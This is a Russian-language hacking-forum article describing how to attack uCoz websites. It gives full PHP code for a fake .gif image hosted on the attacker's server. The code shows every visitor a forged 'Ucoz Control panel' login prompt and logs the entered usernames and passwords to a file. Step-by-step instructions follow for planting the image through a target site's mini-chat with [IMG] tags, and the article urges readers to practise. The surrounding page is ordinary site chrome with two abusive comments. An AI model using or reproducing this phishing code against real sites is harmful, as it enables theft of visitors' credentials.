Меню сайта
Категории раздела
Обычные статьи [5]
Взломы сайтов [4]
Мини-чат
Наш опрос
Оцените мой сайт
Всего ответов: 3643
Статистика

Онлайн всего: 1
Нубов: 1
Кемперов: 0
Форма входа
Суббота, 05-Июл-2025, 8.29.29 AM
Приветствую Вас Разведчик

Каталог статей

Главная » Статьи » Взломы сайтов

Взлом сайта на UCOZ

Взлом сайта на UCOZ

08.11.2008

Привет. Сегодня я расскажу один из способов взлома сайтов на юкозе. Настоящий хакер может найти достаточно много уязвимостей на таких сайтах и знает много способов их взлома. Я надеюсь что скоро тоже буду таким=).

Итак, начнем...
Для начала нажно зарегистировать хост с поддержкой php (например http://mysite.phphost.net) . После регистрации льем на фтп скрипт и ставим права на пустой .txt файл, например : passwords.txt (сюда будут присылаться пассы пользователей похаканного сайта), и на файл smile.gif. Также скачайте любой смайлик в расширении .gif (типа cool.gif).
Затем откройте блокнот, да простой блокнот и напишите следующее:


header("Content-type: image/gif");
$image = imagecreatefromgif('cool.gif');
if(!$_COOKIE['LOGON'])
{
 $login = $_SERVER['PHP_AUTH_USER'];
 $pass = $_SERVER['PHP_AUTH_PW'];
if(strlen($pass) <= 4 || !$login)
 {
  Header('HTTP/1.1 401 Unauthorized');
  Header('WWW-Authenticate: Basic realm="Ucoz Control panel"');
 }
 elseif($login)
 {
setcookie('LOGON',md5($pass));
$f = fopen('passwords.txt', 'ab');
fwrite($f, $login." ||| ".$pass."\r\n");
fclose($f);
 }
}
imagegif($image);
imagedestroy($image);
?>


Как только вы напишите всё - сохраните файл под названием smile, потом поменяйте расширение на gif.
Теперь выбирайте любой юкозовский сайт, например http://target.ucoz.ru/ слева юкозовских сайтов как обычно, у большинства есть мини-чат справа. Так вот - для начала зарегистируйтесь на сайте, потом в мини чате напишите логин, а в содержании сообщения напишите следующее:

[IMG]http://mysite.phphost.net/smile.gif[/IMG]

И нажмите ОК. Если после этого в миничате вместо сообщения появился смайлик - значит радуйтесь, т.к. сайт - уязвимый. После этого у всех кто будет заходить на данную страницу, (в этом примере это http://target.ucoz.ru/) будет появлятся форма в которую нужно будет ввести логин и пароль. У вас при входе на сайт такая форма будет появлятся тоже. И все, введеные логины и пароли в эту форму будут отсылатся в пустой файл passwords.txt, который вы создали в самом начале и залили на фтп.

Удачи! Практикуйтесь. Только на некоторых сайтах эта уязвимость может и не пройти. Но стандрартно созданный юкозовский сайт без доп. своих настроек будет уязвим. Всем спасибо за просмотр, надеюсь статья вам поможет =)))


Особое спасибо нашему порталу hackzone.ru за то, что он такой хороший ))). А также всем участникам хакзоны которые мне помогали во всем, советовали мне нужные вещи и помогают по сей день.

При копировании материалов ссылка на css-mir.ucoz.ru обязательна

Категория: Взломы сайтов | Добавил: DjPxOeNiX (07-Фев-2010)
Просмотров: 13226 | Комментарии: 8 | Рейтинг: 10.0/9
Всего комментариев: 2
-1   Спам
2 АЫАВА   (29-Май-2010 5.15.25 PM) [Материал]
и где текст нах, админ бля

-1   Спам
1 Жук   (10-Май-2010 11.19.45 PM) [Материал]
Админ, ты дятел.
На темном фоне черный текст - это говорит о твоей вислоухости...
Убейся нах...

Добавлять комментарии могут только зарегистрированные пользователи.
[ Регистрация | Вход ]
Поиск
Друзья сайта
  • Официальный блог
  • Сообщество uCoz
  • FAQ по системе
  • Инструкции для uCoz